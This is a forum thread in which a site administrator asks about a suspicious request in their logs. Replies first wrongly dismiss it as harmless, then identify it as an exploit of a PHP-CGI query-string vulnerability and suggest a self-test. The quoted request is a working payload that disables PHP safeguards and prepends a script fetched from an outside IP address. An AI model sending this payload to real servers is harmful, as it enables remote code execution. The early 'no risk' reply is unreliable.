SitePoint Sponsor

User Tag List

Results 1 to 6 of 6
  1. #1
    SitePoint Zealot
    Join Date
    Apr 2003
    Location
    New Zealand
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    What could this query do?

    The following has been showing up in our logs lately. Is it anything to be concerned about?

    /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt

  2. #2
    SitePoint Wizard bronze trophy chris.upjohn's Avatar
    Join Date
    Apr 2010
    Location
    Melbourne, AU
    Posts
    2,189
    Mentioned
    17 Post(s)
    Tagged
    1 Thread(s)
    Have a read of the following article http://huguesjohnson.com/programming/hacking-attempt/

  3. #3
    SitePoint Zealot
    Join Date
    Apr 2003
    Location
    New Zealand
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by chris.upjohn View Post
    Have a read of the following article http://huguesjohnson.com/programming/hacking-attempt/
    Thanks. I read that, but did not come away with a clear understanding of what to check to ensure our system is not vulnerable to this.

  4. #4
    SitePoint Wizard bronze trophy chris.upjohn's Avatar
    Join Date
    Apr 2010
    Location
    Melbourne, AU
    Posts
    2,189
    Mentioned
    17 Post(s)
    Tagged
    1 Thread(s)
    There is no risk, the guy trying to run the URL is attempting to execute PHP commands which can only be run from within a terminal shell.

  5. #5
    SitePoint Zealot
    Join Date
    Apr 2003
    Location
    New Zealand
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by chris.upjohn View Post
    There is no risk, the guy trying to run the URL is attempting to execute PHP commands which can only be run from within a terminal shell.
    Thanks for taking the time to let me know. i appreciate it.

  6. #6
    SitePoint Addict kduv's Avatar
    Join Date
    May 2012
    Location
    Maui, HI
    Posts
    211
    Mentioned
    5 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by chris.upjohn View Post
    There is no risk, the guy trying to run the URL is attempting to execute PHP commands which can only be run from within a terminal shell.
    That's not completely true. There has been a PHP vulnerability recently discovered that enables people to run remote code from the query string on PHP installations running in CGI mode or mod_cgid (not FastCGI). The logs you're currently seeing is a user trying to exploit that very vulnerability. Check to see how PHP is running on your system to know if you're vulnerable. Alternatively, you can also go to /index.php?-s and see if the source to your PHP code is displayed. If it is, you're vulnerable.

    If you're affected, there are many ways to protect against it. I'm not sure if PHP has released a "working" patch yet as I haven't been following it (I'm not affected), but I'm sure you can find out on PHP's website.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •